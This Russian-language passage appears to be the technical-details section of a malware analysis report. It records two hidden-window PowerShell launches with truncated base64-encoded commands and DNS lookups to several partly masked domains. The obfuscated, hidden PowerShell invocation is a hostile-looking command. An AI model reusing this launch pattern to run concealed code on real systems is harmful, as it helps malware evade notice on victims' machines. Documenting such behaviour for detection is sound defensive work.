Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABSAGUAZgBpAG4AZQBkAF8AUwB0AGUAZQBsAF8ASABhAHQAaQB1AHQAPQAnAEkAbgB0AGUAcgBuAGEAbAB3AHcAegAnADsAJABCAG8AbwBrAHMAXwBJAG4AZAB1AHMAdAByAGkAYQBsAF8AXwBNAHUAcwBpAGMAegBxAHcAIAA9ACAAJwA5ADMANwA...
- DNS ASK ma###ekit.com
- DNS ASK ma#####iovanetti.com
- DNS ASK fn######t.xcesslogic.com
- DNS ASK m.###hmads.com
- DNS ASK ej##.##gnusideas.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABSAGUAZgBpAG4AZQBkAF8AUwB0AGUAZQBsAF8ASABhAHQAaQB1AHQAPQAnAEkAbgB0AGUAcgBuAGEAbAB3AHcAegAnADsAJABCAG8AbwBrAHMAXwBJAG4AZAB1AHMAdAByAGkAYQBsAF8AXwBNAHUAcwBpAGMAegBxAHcAIAA9ACAAJwA5ADMANwA...' (со скрытым окном)